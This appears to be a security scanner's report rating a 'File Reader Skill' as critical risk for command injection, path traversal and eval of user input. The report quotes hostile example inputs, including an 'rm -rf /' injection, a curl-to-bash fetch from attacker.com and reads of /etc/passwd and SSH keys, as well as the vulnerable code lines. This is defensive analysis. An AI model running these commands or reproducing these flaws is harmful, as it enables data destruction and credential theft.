← Back to Directory

File Reader Skill

Scanned on 2/7/2026

🚨5/100critical

This skill contains multiple critical vulnerabilities including command injection, path traversal, and arbitrary code execution that could lead to complete system compromise.

Trust Score
5/100
Risk Level
critical
Issues Found
4

Security Analysis

This skill receives a trust score of 5/100 (CRITICAL RISK - DO NOT INSTALL). The code demonstrates three of the most severe security vulnerabilities: command injection, path traversal, and arbitrary code execution via eval(). The readUserFile function allows attackers to execute arbitrary shell commands by injecting malicious input (e.g., 'file.txt; rm -rf /' or 'file.txt && curl attacker.com | bash'). The readFile function permits reading any file on the system through path traversal attacks (e.g., '../../../etc/passwd' or '../../../home/user/.ssh/id_rsa'), potentially exposing sensitive credentials, configuration files, and private keys. The processUserCode function with eval() is extremely dangerous, allowing complete application takeover by executing arbitrary JavaScript code with full application privileges. An attacker could use this to steal environment variables, access databases, exfiltrate data, or establish persistence. The automated security findings correctly identified these critical issues. There are no security controls, input validation, or sanitization present. This code appears to be either a deliberately vulnerable example or extremely negligent implementation. Installing this skill would create immediate and severe security risks including data theft, credential compromise, and complete system takeover.

Security Findings

critical - code-execution

Command injection vulnerability in readUserFile function allows arbitrary command execution through unsanitized user input passed directly to exec()

Evidence:

exec(`cat ${userInput}`, (error, stdout) => {...})
Recommendation: Never pass user input directly to exec(). Use execFile() with an array of arguments, or better yet, use fs.readFile() instead of shell commands. Implement strict input validation and sanitization.
critical - code-execution

Arbitrary code execution via eval() function with user-controlled input allows attackers to execute any JavaScript code in the application context

Evidence:

function processUserCode(code) { eval(code); }
Recommendation: Remove eval() entirely. If dynamic code execution is required, use a sandboxed environment like vm2 or isolated-vm with strict security policies. Consider alternative approaches like configuration-based logic.
critical - filesystem

Path traversal vulnerability in readFile function allows reading arbitrary files on the system through directory traversal sequences

Evidence:

fs.readFileSync(`/data/${filename}`, 'utf8') with no sanitization allows ../../../etc/passwd
Recommendation: Validate and sanitize filename input. Use path.normalize() and path.join(), then verify the resolved path is within the allowed directory. Implement a whitelist of allowed filenames or use path.resolve() with validation.
high - code-execution

Use of child_process.exec is inherently dangerous as it spawns a shell, making command injection easier compared to execFile or spawn

Evidence:

const { exec } = require('child_process');
Recommendation: Replace exec() with execFile() or spawn() which don't invoke a shell. For file reading operations, use native Node.js fs module methods instead.

Source Information

ClawHub Page:clawhub.com/skills/file-reader-skill
Source URL:../demo-skills/file-reader-skill.js
Code Size:809 characters
Semgrep Findings:3